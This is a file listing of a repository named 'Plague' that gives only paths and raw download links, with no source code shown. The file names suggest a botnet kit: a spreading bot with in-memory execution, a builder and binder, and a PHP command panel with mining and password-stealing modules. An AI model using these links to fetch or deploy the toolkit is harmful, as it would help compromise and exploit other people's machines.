├── Bot ├── BTMemoryModule.pas ├── NewTask.xml ├── Plague.dbg ├── Plague.exe ├── Plague.lpi ├── Plague.lpr ├── Plague.lps ├── Plague.res ├── Settings.ini ├── WExecFromMem.pas ├── cmdworker.pas ├── netmodule.lfm ├── netmodule.pas ├── spread.pas └── tools.pas ├── Builder ├── Builder.exe ├── Builder.ico ├── Builder.ini ├── Builder.lpi ├── Builder.lpr ├── Builder.lps ├── Builder.res ├── img │ ├── box-closed.png │ ├── cog.png │ ├── default.ico │ ├── dots-clear.png │ ├── down-arrow.png │ ├── exe.png │ ├── exe_big.png │ ├── file.png │ ├── icon2.png │ ├── move-arrows.png │ ├── open-folder.png │ ├── remove.png │ ├── save.png │ ├── shuffle.png │ ├── substract.png │ ├── up-arrow.png │ ├── virus.png │ └── x.png ├── logic.pas ├── mainunit.lfm ├── mainunit.pas └── mod │ ├── BindPack │ ├── BindPack.exe │ ├── BindPack.lpi │ ├── BindPack.lpr │ └── BindPack.lps │ └── ResTool.exe ├── ModEncrypt ├── ModEncrypt.exe ├── ModEncrypt.lpi ├── ModEncrypt.lps └── ModEncrypt.pas ├── README.md ├── Server ├── avatar.png ├── commands.php ├── dashboard.php ├── data.php ├── detect.php ├── img │ ├── bar-chart.png │ ├── favicon.png │ ├── icon.png │ ├── icon2.png │ ├── icon3.png │ ├── icon4.png │ ├── icon5.png │ ├── icon6.png │ ├── information.png │ ├── insect.png │ ├── module_table_bottom.png │ ├── module_table_top.png │ ├── notepad.png │ ├── noun_Plague Doctor_1322205.png │ ├── spider-web.png │ ├── terminal.png │ ├── wallpaper.png │ └── worldwide.png ├── index.php ├── info.php ├── location.php ├── log.php ├── login.php ├── logout.php ├── logs │ └── .gitignore ├── modules │ ├── Build.mod │ ├── Mine.mod │ ├── Mine64.mod │ ├── Pass.mod │ ├── SmallBuild.mod │ └── config.json ├── plague.sql ├── queue.php ├── reg.php ├── register.php ├── result.php ├── scripts │ ├── Chart.min.js │ ├── datamaps.world.min.js │ ├── jquery-3.3.1.min.js │ └── table_copy.js ├── style.css ├── tabs │ ├── about.html │ ├── commands.php │ ├── detections.html │ ├── map.php │ └── statistics.php └── uploads │ ├── .gitignore │ ├── Important.txt │ ├── TestApp.exe │ └── TestLib.dll └── Update.bat /Bot/BTMemoryModule.pas: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Raffy27/Plague/HEAD/Bot/BTMemoryModule.pas -------------------------------------------------------------------------------- /Bot/NewTask.xml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Raffy27/Plague/HEAD/Bot/NewTask.xml -------------------------------------------------------------------------------- /Bot/Plague.dbg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Raffy27/Plague/HEAD/Bot/Plague.dbg -------------------------------------------------------------------------------- /Bot/Plague.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Raffy27/Plague/HEAD/Bot/Plague.exe -------------------------------------------------------------------------------- /Bot/Plague.lpi: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Raffy27/Plague/HEAD/Bot/Plague.lpi -------------------------------------------------------------------------------- /Bot/Plague.lpr: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Raffy27/Plague/HEAD/Bot/Plague.lpr -------------------------------------------------------------------------------- /Bot/Plague.lps: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Raffy27/Plague/HEAD/Bot/Plague.lps -------------------------------------------------------------------------------- /Bot/Plague.res: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Raffy27/Plague/HEAD/Bot/Plague.res -------------------------------------------------------------------------------- /Bot/Settings.ini: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Raffy27/Plague/HEAD/Bot/Settings.ini -------------------------------------------------------------------------------- /Bot/WExecFromMem.pas: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Raffy27/Plague/HEAD/Bot/WExecFromMem.pas -------------------------------------------------------------------------------- /Bot/cmdworker.pas: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Raffy27/Plague/HEAD/Bot/cmdworker.pas -------------------------------------------------------------------------------- /Bot/netmodule.lfm: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Raffy27/Plague/HEAD/Bot/netmodule.lfm -------------------------------------------------------------------------------- /Bot/netmodule.pas: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Raffy27/Plague/HEAD/Bot/netmodule.pas -------------------------------------------------------------------------------- /Bot/spread.pas: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Raffy27/Plague/HEAD/Bot/spread.pas -------------------------------------------------------------------------------- /Bot/tools.pas: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Raffy27/Plague/HEAD/Bot/tools.pas -------------------------------------------------------------------------------- /Builder/Builder.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Raffy27/Plague/HEAD/Builder/Builder.exe -------------------------------------------------------------------------------- /Builder/Builder.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Raffy27/Plague/HEAD/Builder/Builder.ico -------------------------------------------------------------------------------- /Builder/Builder.ini: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Raffy27/Plague/HEAD/Builder/Builder.ini -------------------------------------------------------------------------------- /Builder/Builder.lpi: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Raffy27/Plague/HEAD/Builder/Builder.lpi -------------------------------------------------------------------------------- /Builder/Builder.lpr: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Raffy27/Plague/HEAD/Builder/Builder.lpr -------------------------------------------------------------------------------- /Builder/Builder.lps: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Raffy27/Plague/HEAD/Builder/Builder.lps -------------------------------------------------------------------------------- /Builder/Builder.res: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Raffy27/Plague/HEAD/Builder/Builder.res -------------------------------------------------------------------------------- /Builder/img/box-closed.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Raffy27/Plague/HEAD/Builder/img/box-closed.png -------------------------------------------------------------------------------- /Builder/img/cog.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Raffy27/Plague/HEAD/Builder/img/cog.png -------------------------------------------------------------------------------- /Builder/img/default.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Raffy27/Plague/HEAD/Builder/img/default.ico -------------------------------------------------------------------------------- /Builder/img/dots-clear.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Raffy27/Plague/HEAD/Builder/img/dots-clear.png -------------------------------------------------------------------------------- /Builder/img/down-arrow.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Raffy27/Plague/HEAD/Builder/img/down-arrow.png -------------------------------------------------------------------------------- /Builder/img/exe.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Raffy27/Plague/HEAD/Builder/img/exe.png -------------------------------------------------------------------------------- /Builder/img/exe_big.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Raffy27/Plague/HEAD/Builder/img/exe_big.png -------------------------------------------------------------------------------- /Builder/img/file.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Raffy27/Plague/HEAD/Builder/img/file.png -------------------------------------------------------------------------------- /Builder/img/icon2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Raffy27/Plague/HEAD/Builder/img/icon2.png -------------------------------------------------------------------------------- /Builder/img/move-arrows.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Raffy27/Plague/HEAD/Builder/img/move-arrows.png -------------------------------------------------------------------------------- /Builder/img/open-folder.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Raffy27/Plague/HEAD/Builder/img/open-folder.png -------------------------------------------------------------------------------- /Builder/img/remove.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Raffy27/Plague/HEAD/Builder/img/remove.png -------------------------------------------------------------------------------- /Builder/img/save.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Raffy27/Plague/HEAD/Builder/img/save.png -------------------------------------------------------------------------------- /Builder/img/shuffle.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Raffy27/Plague/HEAD/Builder/img/shuffle.png -------------------------------------------------------------------------------- /Builder/img/substract.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Raffy27/Plague/HEAD/Builder/img/substract.png -------------------------------------------------------------------------------- /Builder/img/up-arrow.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Raffy27/Plague/HEAD/Builder/img/up-arrow.png -------------------------------------------------------------------------------- /Builder/img/virus.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Raffy27/Plague/HEAD/Builder/img/virus.png -------------------------------------------------------------------------------- /Builder/img/x.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Raffy27/Plague/HEAD/Builder/img/x.png -------------------------------------------------------------------------------- /Builder/logic.pas: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Raffy27/Plague/HEAD/Builder/logic.pas -------------------------------------------------------------------------------- /Builder/mainunit.lfm: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Raffy27/Plague/HEAD/Builder/mainunit.lfm -------------------------------------------------------------------------------- /Builder/mainunit.pas: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Raffy27/Plague/HEAD/Builder/mainunit.pas -------------------------------------------------------------------------------- /Builder/mod/BindPack/BindPack.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Raffy27/Plague/HEAD/Builder/mod/BindPack/BindPack.exe -------------------------------------------------------------------------------- /Builder/mod/BindPack/BindPack.lpi: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Raffy27/Plague/HEAD/Builder/mod/BindPack/BindPack.lpi -------------------------------------------------------------------------------- /Builder/mod/BindPack/BindPack.lpr: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Raffy27/Plague/HEAD/Builder/mod/BindPack/BindPack.lpr -------------------------------------------------------------------------------- /Builder/mod/BindPack/BindPack.lps: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Raffy27/Plague/HEAD/Builder/mod/BindPack/BindPack.lps -------------------------------------------------------------------------------- /Builder/mod/ResTool.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Raffy27/Plague/HEAD/Builder/mod/ResTool.exe -------------------------------------------------------------------------------- /ModEncrypt/ModEncrypt.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Raffy27/Plague/HEAD/ModEncrypt/ModEncrypt.exe -------------------------------------------------------------------------------- /ModEncrypt/ModEncrypt.lpi: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Raffy27/Plague/HEAD/ModEncrypt/ModEncrypt.lpi -------------------------------------------------------------------------------- /ModEncrypt/ModEncrypt.lps: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Raffy27/Plague/HEAD/ModEncrypt/ModEncrypt.lps -------------------------------------------------------------------------------- /ModEncrypt/ModEncrypt.pas: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Raffy27/Plague/HEAD/ModEncrypt/ModEncrypt.pas -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Raffy27/Plague/HEAD/README.md -------------------------------------------------------------------------------- /Server/avatar.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Raffy27/Plague/HEAD/Server/avatar.png -------------------------------------------------------------------------------- /Server/commands.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Raffy27/Plague/HEAD/Server/commands.php -------------------------------------------------------------------------------- /Server/dashboard.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Raffy27/Plague/HEAD/Server/dashboard.php -------------------------------------------------------------------------------- /Server/data.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Raffy27/Plague/HEAD/Server/data.php -------------------------------------------------------------------------------- /Server/detect.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Raffy27/Plague/HEAD/Server/detect.php -------------------------------------------------------------------------------- /Server/img/bar-chart.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Raffy27/Plague/HEAD/Server/img/bar-chart.png -------------------------------------------------------------------------------- /Server/img/favicon.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Raffy27/Plague/HEAD/Server/img/favicon.png -------------------------------------------------------------------------------- /Server/img/icon.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Raffy27/Plague/HEAD/Server/img/icon.png -------------------------------------------------------------------------------- /Server/img/icon2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Raffy27/Plague/HEAD/Server/img/icon2.png -------------------------------------------------------------------------------- /Server/img/icon3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Raffy27/Plague/HEAD/Server/img/icon3.png -------------------------------------------------------------------------------- /Server/img/icon4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Raffy27/Plague/HEAD/Server/img/icon4.png -------------------------------------------------------------------------------- /Server/img/icon5.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Raffy27/Plague/HEAD/Server/img/icon5.png -------------------------------------------------------------------------------- /Server/img/icon6.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Raffy27/Plague/HEAD/Server/img/icon6.png -------------------------------------------------------------------------------- /Server/img/information.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Raffy27/Plague/HEAD/Server/img/information.png -------------------------------------------------------------------------------- /Server/img/insect.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Raffy27/Plague/HEAD/Server/img/insect.png -------------------------------------------------------------------------------- /Server/img/module_table_bottom.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Raffy27/Plague/HEAD/Server/img/module_table_bottom.png -------------------------------------------------------------------------------- /Server/img/module_table_top.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Raffy27/Plague/HEAD/Server/img/module_table_top.png -------------------------------------------------------------------------------- /Server/img/notepad.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Raffy27/Plague/HEAD/Server/img/notepad.png -------------------------------------------------------------------------------- /Server/img/noun_Plague Doctor_1322205.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Raffy27/Plague/HEAD/Server/img/noun_Plague Doctor_1322205.png -------------------------------------------------------------------------------- /Server/img/spider-web.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Raffy27/Plague/HEAD/Server/img/spider-web.png -------------------------------------------------------------------------------- /Server/img/terminal.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Raffy27/Plague/HEAD/Server/img/terminal.png -------------------------------------------------------------------------------- /Server/img/wallpaper.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Raffy27/Plague/HEAD/Server/img/wallpaper.png -------------------------------------------------------------------------------- /Server/img/worldwide.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Raffy27/Plague/HEAD/Server/img/worldwide.png -------------------------------------------------------------------------------- /Server/index.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Raffy27/Plague/HEAD/Server/index.php -------------------------------------------------------------------------------- /Server/info.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Raffy27/Plague/HEAD/Server/info.php -------------------------------------------------------------------------------- /Server/location.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Raffy27/Plague/HEAD/Server/location.php -------------------------------------------------------------------------------- /Server/log.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Raffy27/Plague/HEAD/Server/log.php -------------------------------------------------------------------------------- /Server/login.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Raffy27/Plague/HEAD/Server/login.php -------------------------------------------------------------------------------- /Server/logout.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Raffy27/Plague/HEAD/Server/logout.php -------------------------------------------------------------------------------- /Server/logs/.gitignore: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Server/modules/Build.mod: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Raffy27/Plague/HEAD/Server/modules/Build.mod -------------------------------------------------------------------------------- /Server/modules/Mine.mod: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Raffy27/Plague/HEAD/Server/modules/Mine.mod -------------------------------------------------------------------------------- /Server/modules/Mine64.mod: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Raffy27/Plague/HEAD/Server/modules/Mine64.mod -------------------------------------------------------------------------------- /Server/modules/Pass.mod: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Raffy27/Plague/HEAD/Server/modules/Pass.mod -------------------------------------------------------------------------------- /Server/modules/SmallBuild.mod: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Raffy27/Plague/HEAD/Server/modules/SmallBuild.mod -------------------------------------------------------------------------------- /Server/modules/config.json: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Raffy27/Plague/HEAD/Server/modules/config.json -------------------------------------------------------------------------------- /Server/plague.sql: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Raffy27/Plague/HEAD/Server/plague.sql -------------------------------------------------------------------------------- /Server/queue.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Raffy27/Plague/HEAD/Server/queue.php -------------------------------------------------------------------------------- /Server/reg.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Raffy27/Plague/HEAD/Server/reg.php -------------------------------------------------------------------------------- /Server/register.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Raffy27/Plague/HEAD/Server/register.php -------------------------------------------------------------------------------- /Server/result.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Raffy27/Plague/HEAD/Server/result.php -------------------------------------------------------------------------------- /Server/scripts/Chart.min.js: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Raffy27/Plague/HEAD/Server/scripts/Chart.min.js -------------------------------------------------------------------------------- /Server/scripts/datamaps.world.min.js: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Raffy27/Plague/HEAD/Server/scripts/datamaps.world.min.js -------------------------------------------------------------------------------- /Server/scripts/jquery-3.3.1.min.js: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Raffy27/Plague/HEAD/Server/scripts/jquery-3.3.1.min.js -------------------------------------------------------------------------------- /Server/scripts/table_copy.js: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Raffy27/Plague/HEAD/Server/scripts/table_copy.js -------------------------------------------------------------------------------- /Server/style.css: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Raffy27/Plague/HEAD/Server/style.css -------------------------------------------------------------------------------- /Server/tabs/about.html: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Raffy27/Plague/HEAD/Server/tabs/about.html -------------------------------------------------------------------------------- /Server/tabs/commands.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Raffy27/Plague/HEAD/Server/tabs/commands.php -------------------------------------------------------------------------------- /Server/tabs/detections.html: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Raffy27/Plague/HEAD/Server/tabs/detections.html -------------------------------------------------------------------------------- /Server/tabs/map.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Raffy27/Plague/HEAD/Server/tabs/map.php -------------------------------------------------------------------------------- /Server/tabs/statistics.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Raffy27/Plague/HEAD/Server/tabs/statistics.php -------------------------------------------------------------------------------- /Server/uploads/.gitignore: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Server/uploads/Important.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Raffy27/Plague/HEAD/Server/uploads/Important.txt -------------------------------------------------------------------------------- /Server/uploads/TestApp.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Raffy27/Plague/HEAD/Server/uploads/TestApp.exe -------------------------------------------------------------------------------- /Server/uploads/TestLib.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Raffy27/Plague/HEAD/Server/uploads/TestLib.dll -------------------------------------------------------------------------------- /Update.bat: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Raffy27/Plague/HEAD/Update.bat --------------------------------------------------------------------------------